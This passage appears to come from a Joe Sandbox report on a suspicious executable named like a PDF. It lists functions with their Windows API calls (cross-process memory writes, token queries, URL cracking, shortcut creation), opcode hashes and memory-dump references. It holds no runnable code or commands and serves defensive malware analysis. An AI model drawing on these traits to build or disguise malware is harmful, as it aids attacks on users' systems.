                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                                    • Instruction ID: 52c33abca12398fb53ac6cfdb98265a328a187101b003ef60ae5d757ff74544a
                                                    • Opcode Fuzzy Hash: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                                    • Instruction Fuzzy Hash: F60181B0200205BFDB224FA5DC48D6B7BACEF89355B114439F409C3250D671DC51CB61
                                                    Function 00387A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387A74
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A82
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00387A8A
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A94
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                                    • Instruction ID: 5613e833f16b4338959938498a5b60236c1ee5491a71cf8ce3992b85e9689b97
                                                    • Opcode Fuzzy Hash: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                                    • Instruction Fuzzy Hash: 23012931C04619EBCF06AFE4DC88AEDBB7DFB08711F150495E502F2250DB34E65487A1
                                                    Function 00379ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CLSIDFromProgID.OLE32 ref: 00379ADC
                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                                    • CLSIDFromString.OLE32(?,?), ref: 00379B21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                                    • Instruction ID: d634e4c02750dffa52a9a86994efe2f74cf290f0661a5e38fbe6eb9cd1876852
                                                    • Opcode Fuzzy Hash: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                                    • Instruction Fuzzy Hash: 32018F76600204BFDB224F64EC44F9ABBEDEB44351F148039F90AE6210D775ED009BA0
                                                    Function 0037AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                                    • Instruction ID: 91657624a1d20a31aa9356a43290fa10c027621c8da6bcfea3027a3411b88132
                                                    • Opcode Fuzzy Hash: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                                    • Instruction Fuzzy Hash: 28F0C2312003146FEB221FA4EC88E6B3BACFF89754F004029F905C7190DB64AC02CF61
                                                    Function 0037AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0037AADA
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAE4
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAF3
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAFA
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AB10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                                    • Instruction ID: 587ebedc3deeb186a9cf057577990a426df113b7d85bf608e9bc90951bc8a616
                                                    • Opcode Fuzzy Hash: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                                    • Instruction Fuzzy Hash: 02F062752012186FEB220FA5EC88E6B3B6DFF85754F014039F946C7190CB65AC02DB61
                                                    Function 0037EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037EC94
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0037ECAB
                                                    • MessageBeep.USER32(00000000), ref: 0037ECC3
                                                    • KillTimer.USER32(?,0000040A), ref: 0037ECDF
                                                    • EndDialog.USER32(?,00000001), ref: 0037ECF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                                    • Instruction ID: afda34c6342097eea55e29691c0819d23806fd0027d12b24880c89c25b03e19f
                                                    • Opcode Fuzzy Hash: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                                    • Instruction Fuzzy Hash: F1016D34500715ABEB375B10DE4EF9677BCBB04B05F0045A9F686A54E0DBF4BA54CB44
                                                    Function 0035B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 0035B0BA
                                                    • StrokeAndFillPath.GDI32(?,?,003BE680,00000000,?,?,?), ref: 0035B0D6
                                                    • SelectObject.GDI32(?,00000000), ref: 0035B0E9
                                                    • DeleteObject.GDI32 ref: 0035B0FC
                                                    • StrokePath.GDI32(?), ref: 0035B117
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                                    • Instruction ID: 908d28fd08589c3323ac58d6fc00fd62d686dc1addae9dfe1915b40ef7536e49
                                                    • Opcode Fuzzy Hash: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                                    • Instruction Fuzzy Hash: CCF0EC30000644EFDB639F69EE4DB597FA9B710362F088725F825950F0C7729959DF54
                                                    Function 0038F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0038F2DA
                                                    • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038F2F2
                                                    • CoUninitialize.OLE32 ref: 0038F555
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize
                                                    • String ID: .lnk
                                                    • API String ID: 948891078-24824748
                                                    • Opcode ID: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                                    • Instruction ID: e7a13b3f0891bfe8367f9cab395e22c8b1b1bc349835b30e3e98885ce4e9151a
                                                    • Opcode Fuzzy Hash: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                                    • Instruction Fuzzy Hash: 77A14C71104301AFD302EF64C881EABB7ECEF99714F00495DF5559B2A2EB70EA49CB52
                                                    Function 0038E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                                    • CoInitialize.OLE32(00000000), ref: 0038E85D
                                                    • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038E876
                                                    • CoUninitialize.OLE32 ref: 0038E893
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                                    • Instruction ID: 9010150a3e71575910db39baa6c6e3e870ca54d4d17669b385c80a9191caa34a
                                                    • Opcode Fuzzy Hash: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                                    • Instruction Fuzzy Hash: EDA154356043019FCB16EF14C484E6ABBE5BF89710F058999F99A9B3A2CB31FC45CB81
                                                    Function 0036325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 003632ED
                                                      • Part of subcall function 0036E0D0: __87except.LIBCMT ref: 0036E10B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: 7a04ef08070da80804341e7c43b11654f4a4e4096dcb089522376aee54e6f3a8
                                                    • Instruction ID: 71e0ada42bf3001baf5a01f2d70fcaa584b386519d0f346f0173e80c2fe4baff
                                                    • Opcode Fuzzy Hash: 7a04ef08070da80804341e7c43b11654f4a4e4096dcb089522376aee54e6f3a8
                                                    • Instruction Fuzzy Hash: 5F517A79A0920296CB137714DD2237A3B98DB41710F31CD29F4D5862EDEF388E9CA646
                                                    Function 00341F21 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: d6751d63c67bb8c1c6eb5fac35499e7becd326bae71f08e366ad00a48b84de85
                                                    • Instruction ID: e62b79982c2fc209de13cf4ca3540da493f8bc85f59cf5b8a42058ba3416af2a
                                                    • Opcode Fuzzy Hash: d6751d63c67bb8c1c6eb5fac35499e7becd326bae71f08e366ad00a48b84de85
                                                    • Instruction Fuzzy Hash: 3D512E305042269FDB27DF28C841AFA7BE8EF66304F694015FD81AF6A0D734AE46C720
                                                    Function 00384606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003DDC50,?,0000000F,0000000C,00000016,003DDC50,?), ref: 00384645
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003846C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                    • String ID: REMOVE$THIS
                                                    • API String ID: 3797816924-776492005
                                                    • Opcode ID: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                                    • Instruction ID: 77d769cf1468961bb1d522aa026d9222460629605a2b201531777a2f72db70e6
                                                    • Opcode Fuzzy Hash: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                                    • Instruction Fuzzy Hash: 49414F74A0021A9FCF06EF64C881AAEB7B5FF49304F1480A9F956AF661D734ED45CB50
                                                    Function 0037C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0038430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC08,?,?,00000034,00000800,?,00000034), ref: 00384335
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0037C1D3
                                                      • Part of subcall function 003842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00384300
                                                      • Part of subcall function 0038422F: GetWindowThreadProcessId.USER32(?,?), ref: 0038425A
                                                      • Part of subcall function 0038422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0038426A
                                                      • Part of subcall function 0038422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00384280
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C240
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C28D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                                    • Instruction ID: 7da4488d468da707deaae12b3b6c0be081efdf1761b55fe66bef5d11228de72d
                                                    • Opcode Fuzzy Hash: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                                    • Instruction Fuzzy Hash: 6E414E7690021DBFDB12EFA4CC81AEEB7B8AF09300F004499FA45BB181DA756E45CB61
                                                    Function 003AA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003DDC00,00000000,?,?,?,?), ref: 003AA6D8
                                                    • GetWindowLongW.USER32 ref: 003AA6F5
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003AA705
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                                    • Instruction ID: 17e4b9a4e06ef2e38cee95db115bd6f944229aca0628d6af39bc101d31032e6e
                                                    • Opcode Fuzzy Hash: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                                    • Instruction Fuzzy Hash: 98319032100A05ABDB128E74CC45FEB77A9EB4A324F254725F975932E0CB75AC50DB50
                                                    Function 00395180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00395190
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003951C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |$D9
                                                    • API String ID: 1413715105-3281666953
                                                    • Opcode ID: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                                    • Instruction ID: 5eacfabc5bd0c5773d876d6a6b8d7ddf623ef35c6728153f3a2c8b7a4cbf174c
                                                    • Opcode Fuzzy Hash: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                                    • Instruction Fuzzy Hash: 13313B71C11119ABCF42EFE4CC85AEE7FB9FF14710F100019F915AA166DB71AA46DBA0
                                                    Function 003AA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003AA15E
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003AA172
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AA196
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
